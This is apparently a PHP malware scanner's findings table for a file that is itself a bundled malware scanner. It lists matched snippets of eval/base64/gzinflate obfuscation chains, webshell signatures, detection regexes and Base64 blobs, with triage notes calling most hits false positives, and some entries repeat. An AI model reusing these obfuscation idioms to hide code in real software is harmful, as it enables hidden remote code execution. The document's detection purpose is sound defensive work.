posix_getpwuid($owner_id); if (!isset($owner['name']) || $owner['name'] !== 'root') { return false; } } elseif ($owner_id != 0) { return false; } $perms = fileperms($folder); if (($perms & 0x0100) && ($perms & 0x0080) && ($perms & 0x0040) && !($perms & 0x0800) && !($perms & 0x0010) && !($perms & 0x0002) ) { return true; } return false; } protected function isWorldWriteable($folder) { if (!file_exists($folder) || !is_dir($folder)) { return false; } $perms = fileperms($folder); if (($perms & 0x000...
| Function posix_kill Warning Potentially dangerous function `posix_kill` [https://www.php.net/posix_kill] |
posix_kill($pid, SIGUSR1); } else { $this->debugLog("Job {$file}: Sending SIGUSR2 to {$pid}"); posix_kill($pid, SIGUSR2); } } elseif ($type == 'notify' && $malware) { $filename = basename($file, '.notify_job'); $reports[JSONReport::class] = $this->resident_out_dir . '/' . $filename . '.report'; foreach($this->report->call($this, $reports) as $report) { $report->generateReport($vars, $scan_time); $this->debugLog("Job {$file}: Creating report for job in {$filename}.report"); $report->write(); } un...
| Function posix_setuid Warning Potentially dangerous function `posix_setuid` [https://www.php.net/posix_setuid] |
posix_setuid($info['uid']); $defaults['userid'] = $info['uid']; $defaults['groupid'] = $info['gid']; } else { echo ('Invalid username'); exit(-1); } } if (isset($options['no-users'])) { $vars->users = null; } $avdb = ''; if ((isset($options['avdb']) && !empty($options['avdb']) && ($avdb = $options['avdb'])) || (isset($options['c']) && !empty($options['c']) && ($avdb = $options['c']))) { if (file_exists($avdb)) { $defaults['avdb'] = $avdb; } } if ((isset($options['file']) && !empty($options['file...
| Function str_rot13 eval_str_rot13 Line: 15166 Dangerous Encoded Function `eval` [https://www.php.net/eval] |
riny
| Function strrev eval_strrev Line: 15174 Dangerous Encoded Function `eval` [https://www.php.net/eval] |
lave
| Function strrev eval_strrev Line: 8770 Dangerous Encoded Function `eval` [https://www.php.net/eval] |
LAvE
| Function system Warning Potentially dangerous function `system` [https://www.php.net/system] |
system (Default: 1). -u, --username=<username> Run scanner with specific user id and group id, e.g. --username=www-data. -q, --quite Do not output information about the current scan job to a console.
Scan options: -y, --deobfuscate Try to deobfuscate files when scanning. --with-suspicious Detect suspicious files. Disabled by default. --scan-archive Scan zip files (Works wit...
| Sign 11413268 Line: 16766 Dangerous Malware Signature (hash: 11413268) |
eval(base64_decode(
| Sign 11413268 Line: 22037 Dangerous Malware Signature (hash: 11413268) |
eval(gzinflate(str_rot13
| Sign 11413268 Line: 22487 Dangerous Malware Signature (hash: 11413268) |
eval(str_rot13
| Sign 11413268 Line: 7125 Dangerous Malware Signature (hash: 11413268) |
exploit
| Sign 301ca578 Line: 16249 Dangerous Malware Signature (hash: 301ca578) |
tmhapbzcerff
| Sign 34b7e999 Line: 16789 Dangerous Malware Signature (hash: 34b7e999) |
default_action="FilesMan
| Sign 34b7e999 Line: 2092 Dangerous Malware Signature (hash: 34b7e999) |
dMT0JBTF
| Sign 43b0d90f Line: 15587 Dangerous Malware Signature (hash: 43b0d90f) |
edoced_46esab
| Sign 43b0d90f Line: 15592 Dangerous Malware Signature (hash: 43b0d90f) |
etalfnizg
| Sign 43b0d90f Line: 18156 Dangerous Malware Signature (hash: 43b0d90f) |
Edoced_46esab
| Sign 4a069524 Line: 2092 Dangerous Malware Signature (hash: 4a069524) |
aW5jbHVkZ
| Sign 5c38b15f Line: 7232 Dangerous Malware Signature (hash: 5c38b15f) |
1337day.com
| Sign 7186bb8d Line: 8668 Dangerous Malware Signature (hash: 7186bb8d) |
rootkit
| Sign 7830f7a6 Line: 2081 Dangerous Malware Signature (hash: 7830f7a6) |
nVch
| Sign 963e968a Line: 13939 Dangerous Malware Signature (hash: 963e968a) |
PHPJiaMi
| Sign d97f004d Line: 2092 Dangerous Malware Signature (hash: d97f004d) |
zeXN0ZW
| Sign ee1cb326 Line: 2081 Dangerous Malware Signature (hash: ee1cb326) |
9wZw
| Sign f9dc0a55 Line: 12638 Dangerous Malware Signature (hash: f9dc0a55) |
'base64_decode'
| Sign f9dc0a55 Line: 15707 Dangerous Malware Signature (hash: f9dc0a55) |
"base64_decode"
| Sign f9dc0a55 Line: 16983 Dangerous Malware Signature (hash: f9dc0a55) |
'" . base64_decode
| Sign f9dc0a55 Line: 18917 Dangerous Malware Signature (hash: f9dc0a55) |
'' . base64_decode
|
|
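//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/tools/ai-bolit-hoster.php Size: 1.76 MB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Warns: 14 Dangers: 81
Triage note: the path and the matched snippets below (scanner help text, `deobfuscate…` methods, signature regexes) indicate that this file is itself a malware scanner shipped with the antivirus addon. Most hits are therefore expected to be its own detection patterns and deobfuscation routines rather than live payloads. Treat the counts as probable false positives, but confirm by comparing the file's checksum with a copy from the vendor's package. If the file is then excluded from future scans, key the exclusion on that hash rather than on the path, so that a later modification of the file is still reported.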
| Description | Match |
|---|
Exploit base64_long Line: 2087 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
"5X2JdttGtuCvxHJkEQJFEuAuiqIdx306fdKdfrbTPe+xZDVIQiJtimAT1BaB/z53qwUg5Dhv5rwz50y6TWEp1Hrr7vdWdBo2OqdPi9PGID0NgubpwVmk5v58E1+p+fEQ/ik1Gh8dXMy323U6Oq3Xx5/qcPvUqPb7O3X/Od6k8WM6/oTPgmqrsZPy8OX5WN2ruX48kaIjedqoBu3dWT06PxgsTgNoPeyF0HplcbWJbmIPOlEZnap7+Bra4a5Qvfdcn7ThjdLN1HmN3TyFa+zn0UF9oEbYPnS1rj9UNah3PV9n0+uFB32FYlzIVvptDWMpKptuH5dxdr+YbefZPF5cz7ee+x2VmS3S9TJ6hBv8aJWsYv584I2kXDZuBOGF3HgeNNbE5s/h31ldBTRNIS5SqwXTlE43i/VWpf72cR2rFFpL6cNt/LCtf47uIi5AHUiPcY6kzMHRBbQsq+mN6vXJYqtqy8f6WM2ik98unlrVINzJd+fw76z...
| Exploit base64_long Line: 2092 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
"YTo1OntzOjEwOiJ3aXphcmQucGhwIjtzOjM3OiJjbGFzcyBXZWxjb21lU3RlcCBleHRlbmRzIENXaXphcmRTdGVwIjtzOjE3OiJ1cGRhdGVfY2xpZW50LnBocCI7czozNzoieyBDVXBkYXRlQ2xpZW50OjpBZGRNZXNzYWdlMkxvZygiZXhlYyI7czoxMToiaW5jbHVkZS5waHAiO3M6NDg6IkdMT0JBTFNbIlVTRVIiXS0+SXNBdXRob3JpemVkKCkgJiYgJGFyQXV0aFJlc3VsdCI7czo5OiJzdGFydC5waHAiO3M6NjA6IkJYX1JPT1QuJy9tb2R1bGVzL21haW4vY2xhc3Nlcy9nZW5lcmFsL3VwZGF0ZV9kYl91cGRhdGVyLnBocCI7czoxMDoiaGVscGVyLnBocCI7czo1ODoiSlBsdWdpbkhlbHBlcjo6Z2V0UGx1Z2luKCJzeXN0ZW0iLCJvbmVjbGlja2NoZWNrb3V0X3Z...
| Exploit base64_long Line: 8766 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
'7Z0JYBTV/cfn2myWJLvJZsMVxCCgeADe9UAlhABRSEII3gq21Wq1ak+tokFttbRUQfBWRFvrXa21VWsLWK1HT3vaVlvofQtFFAST/N+bmd1989mZ2RxLwr/s4Pr2s9957/femzdv3kx2f7/XX3/9dU2zIq0TDE1bbGpyq4z/+h4ts+m6eDnvxKtOS1PultYfaXW4Dpp8/UTCO5o2da7z+eLTvWVY4iVr0a1si0TVxH/alGlCn+q8l/tEYEO+f7zV0biZSrlD3M/k+3Q+qdW9nW1bOpX9Yqn7uPnKXPvj3X33dvffW8kvX4abpu1bCvttMv9kfDZfvKaWecuUdZBlVM4NKMhnk/nWvd3z/eVW46b7uOmBbjpK2adOvPbqY37ZDjV/+pikKzzV6F19/bbZoowhCss+fE5zjl+agzZLeV0sXuvE63F8Hra1uuU/4hrJNMd9E02kt3ip2Mrl7qVWaWa3k938LwTkj0SdLVIit2hUtwxL3Ra...
| Exploit base64_long Line: 8768 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
'7ZrLUhpBFIZ7huEyiiJe8IIoKt7wMm1VllYFNqkskpSLPIDvkY3LLF1mmefIiqos8hAs8hDZYMlAuofu6e4fUQgaielf29Nfn+5zpmemAM/QbDabhHjJixNCyFWCcN3++PyNKDnRL5F/lUXx8TJr2cUelwfMIbuKa4umv8vkCiv5lWvm1I9Dz3FXPilXNBmXaP2y8H2p9O8xOi9abD1HQjQ+1xNj0jqiuZDfhXEUX5+EsYTWl3H1fQwrvq5RGW3NvrBU2HXNV2Zt+65FsLmrPCF57QpmidrHlGiDVK7HKk8EuwkvmUpn/Kni3Tzq+ufez6TzQ+fbsmXLli2/DH7u9xvLli1btmzZ8rNzLU/I5RwbZ5aylq3X04OKJ3Wtz+fWwY/LEsAeMNZhUsBp4AywD8zrHHwfUkXWHDiwGcwplU6zlvIc4nENKh/1SZbXRq3jHAnb6fY0bD5UVlhZ/cH9aS5xGpyh9/YU8VA51q5zvXshul/YRW3...
| Exploit base64_long Line: 8770 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
'7ZtNk9REGMefZF72jd0MD6ALC7sDgryIAr6iogwKCIgUBw8cPGCVJ7+CB+cjcPDgkYMHLlbxDdwqrdKjR6v24FegysuyLDumJ88/yfN0ZmZnRmpgzW+rt///7qQ76STdPZ2ZtbW1NaJqjS4RUbtCjjs3l5kUQfp/X+qKaRodmO2PumrOZr69ovfvxNQlhj8a6jKcjpOoInWsL2f1Ta8keZa6BJRLOd2U8v46k+27gI0u6fPKn18tDgfkeJYkDXEo6RWJq7kAX8SSqYOkjDyBHLuLr5n264crp3V2+9s7jkuMYzpStFFRg+do1bSfj8MiZefV734KwJQj8JgKqkG8UbVST3wtJZhONwr1PsYOzp8gM9K8D8IkfijPwm1pvK8qyX29WknSW9XkMcZz91NYcHkacl3i0I6BdvfUz3Heqmx2Y47o+4jomLl+oHsIwYCLvwO4G4ev4/BNHO45Hzfs3bidv52N44bcv/1u4jGY91ICV1WQ98P...
| Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
"YToxNTY1OntzOjM6IuKAqCI7czoxOiIgIjtzOjM6IuKAqSI7czoxOiIgIjtzOjM6IuGagCI7czoxOiIgIjtzOjM6IuKAgCI7czoxOiIgIjtzOjM6IuKAgSI7czoxOiIgIjtzOjM6IuKAgiI7czoxOiIgIjtzOjM6IuKAgyI7czoxOiIgIjtzOjM6IuKAhCI7czoxOiIgIjtzOjM6IuKAhSI7czoxOiIgIjtzOjM6IuKAhiI7czoxOiIgIjtzOjM6IuKAiCI7czoxOiIgIjtzOjM6IuKAiSI7czoxOiIgIjtzOjM6IuKAiiI7czoxOiIgIjtzOjM6IuKBnyI7czoxOiIgIjtzOjI6IsKgIjtzOjE6IiAiO3M6Mzoi4oCHIjtzOjE6IiAiO3M6Mzoi4oCvIjtzOjE6IiAiO3M6Mjoiw4IiO3M6MToiICI7czoyOiLfuiI7czoxOiJfIjtzOjM6Iu+5jSI7czoxOiJfIjtzOjM6Iu+5jiI...
| Exploit concat_vars_array Warning Concatenation of arrays technique is usually used for the obfuscation of malicious code |
$JYekrRTYM[2] . $JYekrRTYM[14] . $JYekrRTYM[13] . $JYekrRTYM[21] . $JYekrRTYM[4] . $JYekrRTYM[17] . $JYekrRTYM[19] . $JYekrRTYM[26] . $JYekrRTYM[20] . $JYekrRTYM[20] . $JYekrRTYM[3] . $JYekrRTYM[4] . $JYekrRTYM[2] . $JYekrRTYM[14] . $JYekrRTYM[3] . $JYekrRTYM[4]; return Helpers::convertToSafeFunc($jPnPLPZcMHgH) ? $jPnPLPZcMHgH($sBtUiFZaz) : ''; }
| Exploit download_remote_code2 Line: 16282 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine |
fwriteB64DecodedStr', ], [ 'full' => '~file_put_contents\(\$_SERVER\[\'[^\']+\'\]\.\'[^\']+\',base64_decode\(\'[^\']+\'\)
| Exploit eval_base64 Line: 16766 Dangerous RCE (Remote Code Execution), through Base64 text, allow remote attackers to execute arbitrary commands or code on the target machine |
eval(base64_decode(')
| Exploit eval_base64 Line: 16808 Dangerous RCE (Remote Code Execution), through Base64 text, allow remote attackers to execute arbitrary commands or code on the target machine |
eval(base64_decode(\')
| Exploit eval_base64 Line: 17160 Dangerous RCE (Remote Code Execution), through Base64 text, allow remote attackers to execute arbitrary commands or code on the target machine |
eval(base64_decode(' . $matches[3] . ')
| Exploit eval_base64 Line: 22248 Dangerous RCE (Remote Code Execution), through Base64 text, allow remote attackers to execute arbitrary commands or code on the target machine |
eval(base64_decode(gzinflate(base64_decode(')
| Exploit eval_base64 Line: 22604 Dangerous RCE (Remote Code Execution), through Base64 text, allow remote attackers to execute arbitrary commands or code on the target machine |
eval(base64_decode(gzinflate(base64_decode(\'' . $matches[6] . '\')
| Exploit eval_preg Line: 22504 Dangerous RCE (Remote Code Execution), through PCRE (Perl compatible Regular Expression), allow remote attackers to execute arbitrary commands or code on the target machine |
preg_replace("/' . $matches[2] . '/e",\'\'', '\'\',"' . $matches[2] . '")
| Exploit execution Line: 1665 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(str_rot13(strrev(trim(file_get_contents($avdb_file)
| Exploit execution Line: 16766 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
eval(base64_decode(')
| Exploit execution Line: 16808 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
eval(base64_decode(\')
| Exploit execution Line: 17160 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
eval(base64_decode(' . $matches[3] . ')
| Exploit execution Line: 17397 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(str_rot13($layer2)
| Exploit execution Line: 17506 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(str_rot13($match[2])
| Exploit execution Line: 17510 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(str_rot13($m[2])
| Exploit execution Line: 17575 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(gzinflate(base64_decode(str_rot13($matches[3])
| Exploit execution Line: 18256 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(gzinflate(str_rot13(convert_uudecode(gzinflate(base64_decode(strrev($matches[12])
| Exploit execution Line: 18691 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(base64_decode($matches[4])
| Exploit execution Line: 18758 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(str_rot13($matches[4])
| Exploit execution Line: 19362 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(str_rot13(Helpers::getTextInsideQuotes(end($array)
| Exploit execution Line: 19370 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(str_rot13(Helpers::getTextInsideQuotes(Helpers::getEvalCode($phpcode)
| Exploit execution Line: 19484 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(base64_decode(str_rot13($str_to_concat)
| Exploit execution Line: 20037 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(base64_decode($result)
| Exploit execution Line: 20660 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(str_rot13($m[1])
| Exploit execution Line: 20757 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(str_rot13($encodedStr)
| Exploit execution Line: 21953 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
eval(base64_decode')
| Exploit execution Line: 21957 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
eval(gzinflate(base64_decode')
| Exploit execution Line: 22037 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
eval(gzinflate(str_rot13(base64_decode(' . $matches[2] . ')
| Exploit execution Line: 22092 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(gzinflate(str_rot13(convert_uudecode(gzinflate(base64_decode($matches[1])
| Exploit execution Line: 22154 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(str_rot13($openssl_data[2])
| Exploit execution Line: 22155 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(str_rot13($openssl_data[4])
| Exploit execution Line: 22158 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(str_rot13($decoded)
| Exploit execution Line: 22248 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
eval(base64_decode(gzinflate(base64_decode(')
| Exploit execution Line: 22249 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(gzinflate(base64_decode($matches[11])
| Exploit execution Line: 22261 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(gzinflate(base64_decode($matches[4])
| Exploit execution Line: 22323 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(gzinflate(base64_decode($matches[2])
| Exploit execution Line: 22377 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(str_rot13(implode('', $array)
| Exploit execution Line: 22487 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
eval(str_rot13(gzinflate(str_rot13(gzinflate(base64_decode(')
| Exploit execution Line: 22604 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
eval(base64_decode(gzinflate(base64_decode(\'' . $matches[6] . '\')
| Exploit hex_char Line: 15511 Dangerous Hex char is usually used for the obfuscation of malicious code |
\x5f
| Exploit ioncube_loader Line: 15345 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
IonCube_loader
| Exploit md5_create_function Dangerous The `create_function` technique is usually used for the obfuscation of malicious code |
$md5 = md5($res); $res = base64_decode(str_replace($md5, '', strtr($matches[5], $matches[6], $matches[7]))); if (preg_match('~eval\((?:\$[^(]{0,50}\(){2}\$[^,]{0,50},\s{0,10}\'([^\']{1,500})\',\s{0,10}\'([^\']{1,500})\'\){3};~msi', $res, $match)) { $res = Helpers::replaceVarsFromArray($vars, $res); if (preg_match('~eval\(base64_decode\(strtr\(~msi', $res)) { $res = base64_decode(strtr($arr1, $match[1], $match[2])); } } } return $res; } private function deobfuscateEvalArrayVar($str, $matches) { $...
| Exploit nano Line: 12287 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$expr_arr[1](explode(',', $expr_arr[2])
| Exploit nano Line: 12293 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$expr_arr[1]((int)
| Exploit nano Line: 12296 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$expr_arr[1]($expr_arr[2])
| Exploit nano Line: 14123 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$args[1](@$args[2]($args[3])
| Exploit nano Line: 14145 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$args[0](@$args[1]($args[2])
| Exploit nano Line: 14193 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$params[$i]($params[0])
| Exploit nano Line: 14876 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$func_params['func']($val1)
| Exploit nano Line: 14894 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$func_params['func']($val1, $val2)
| Exploit nano Line: 15014 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$function_otions['func'](...$params_array)
| Exploit nano Line: 16794 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$_[GPRC](?:OST|ET|EQUEST|OOKIE)
| Exploit nano Line: 19821 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$match[2]($str[$dictionaryName], $match[4])
| Exploit nano Line: 20382 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$matches[4]($matches[6])
| Exploit nano Line: 22583 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$m[1]($m[2])
| Exploit nano Line: 23614 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$config[$class](...$constructorArgs)
| Exploit reversed Line: 16033 Dangerous Reverse function technique is used for the obfuscation of dangerous PHP functions |
ecalper_rts
| Exploit silenced_eval Line: 17499 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine |
@eval((?:\(\$[0O]+\[[\'"]\w+[\'"]\])
| Function assert Warning Potentially dangerous function `assert` [https://www.php.net/assert] |
assert(', 'eval(', $string); $string = str_replace('@@slaquote@@', '\\\'', $string); $string = str_replace('@@sladquote@@', '\\"', $string); $string = str_replace("eval(''.", 'eval(', $string); $res = str_replace($find, $string, $str); if (strpos($string, 'gzinflate(\'') !== false) { $res = $this->deobfuscateEval(stripcslashes($res), []); } return $res; } private function deobfuscateEval($str, $matches) { if (preg_match('~\)+\..{0,30}base64_decode~msi', $str)) { $res = explode(').', $str); $res ...
| Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function(\'', $cr_func, 2)); $func = implode(') {', explode('\',\'', $func, 2)); $func = substr($func, 0, -2) . '}'; $str = str_replace($cr_func, $func, $str); } return $str; } public static function calc($expr) { if (is_array($expr)) { $expr = $expr[0]; } $expr = str_replace([' ', "\r", "\n", "\t"], '', $expr); preg_match('~(chr|min|max|round)?\(([^\)]+)\)~msi', $expr, $expr_arr); if (@$expr_arr[1] == 'min' || @$expr_arr[1] == 'max') { return $expr_arr[1](explode(',', $expr_arr[2])); } e...
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval(?&c)\()?(?&c)rawurldecode(?&c)\((?&c)\3(?&c)\)(?&c)\s*\^\s*substr(?&c)\((?&c)str_repeat(?&c)\((?&c)\2,\s*(?&c)\((?&c)strlen(?&c)\((?&c)\3(?&c)\)(?&c)/strlen(?&c)\((?&c)\2(?&c)\)(?&c)\)(?&c)\s*\+\s*1(?&c)\)(?&c),\s*0,(?&c)\s*strlen(?&c)\((?&c)\3(?&c)\)(?&c)\)(?&c)\)(?:(?&c)\s*\.\s*\'{\'(?&c)\))?(?&c);~msi', 'id' => 'xorFName', ], [ 'full' => '~(\$\w{1,40})=base64_decode\(\'[^\']+\'\);(\$\w+)=base64_decode\(\'[^\']+\'\);(\$\w+)=base64_decode\(\'([^\']+)\'\);eval\(\1\(gzuncompress\(\2\(\3\)\)\...
| Function posix_getpwuid Warning Potentially dangerous function `posix_getpwuid` [https://www.php.net/posix_getpwuid] |
posix_getpwuid($owner_id); if (!isset($owner['name']) || $owner['name'] !== 'root') { return false; } } elseif ($owner_id != 0) { return false; } $perms = fileperms($folder); if (($perms & 0x0100) && ($perms & 0x0080) && ($perms & 0x0040) && !($perms & 0x0800) && !($perms & 0x0010) && !($perms & 0x0002) ) { return true; } return false; } protected function isWorldWriteable($folder) { if (!file_exists($folder) || !is_dir($folder)) { return false; } $perms = fileperms($folder); if (($perms & 0x000...
| Function posix_kill Warning Potentially dangerous function `posix_kill` [https://www.php.net/posix_kill] |
posix_kill($pid, SIGUSR1); } else { $this->debugLog("Job {$file}: Sending SIGUSR2 to {$pid}"); posix_kill($pid, SIGUSR2); } } elseif ($type == 'notify' && $malware) { $filename = basename($file, '.notify_job'); $reports[JSONReport::class] = $this->resident_out_dir . '/' . $filename . '.report'; foreach($this->report->call($this, $reports) as $report) { $report->generateReport($vars, $scan_time); $this->debugLog("Job {$file}: Creating report for job in {$filename}.report"); $report->write(); } un...
| Function posix_setuid Warning Potentially dangerous function `posix_setuid` [https://www.php.net/posix_setuid] |
posix_setuid($info['uid']); $defaults['userid'] = $info['uid']; $defaults['groupid'] = $info['gid']; } else { echo ('Invalid username'); exit(-1); } } if (isset($options['no-users'])) { $vars->users = null; } $avdb = ''; if ((isset($options['avdb']) && !empty($options['avdb']) && ($avdb = $options['avdb'])) || (isset($options['c']) && !empty($options['c']) && ($avdb = $options['c']))) { if (file_exists($avdb)) { $defaults['avdb'] = $avdb; } } if ((isset($options['file']) && !empty($options['file...
| Function str_rot13 eval_str_rot13 Line: 15166 Dangerous Encoded Function `eval` [https://www.php.net/eval] |
riny
| Function strrev eval_strrev Line: 15174 Dangerous Encoded Function `eval` [https://www.php.net/eval] |
lave
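| Function strrev eval_strrev Line: 8770 Dangerous Encoded Function `eval` [https://www.php.net/eval] |
LAvE
Triage note: line 8770 is also reported in this table as `base64_long`. A four-letter, mixed-case `LAvE` on that line is most likely a chance substring of the Base64 text rather than a reversed `eval` call; check the surrounding characters on that line before escalating.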
| Function system Warning Potentially dangerous function `system` [https://www.php.net/system] |
system (Default: 1). -u, --username=<username> Run scanner with specific user id and group id, e.g. --username=www-data. -q, --quite Do not output information about the current scan job to a console.
Scan options: -y, --deobfuscate Try to deobfuscate files when scanning. --with-suspicious Detect suspicious files. Disabled by default. --scan-archive Scan zip files (Works wit...
| Sign 11413268 Line: 16766 Dangerous Malware Signature (hash: 11413268) |
eval(base64_decode(
| Sign 11413268 Line: 22037 Dangerous Malware Signature (hash: 11413268) |
eval(gzinflate(str_rot13
| Sign 11413268 Line: 22487 Dangerous Malware Signature (hash: 11413268) |
eval(str_rot13
| Sign 11413268 Line: 7125 Dangerous Malware Signature (hash: 11413268) |
exploit
| Sign 301ca578 Line: 16249 Dangerous Malware Signature (hash: 301ca578) |
tmhapbzcerff
| Sign 34b7e999 Line: 16789 Dangerous Malware Signature (hash: 34b7e999) |
default_action="FilesMan
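| Sign 34b7e999 Line: 2092 Dangerous Malware Signature (hash: 34b7e999) |
dMT0JBTF
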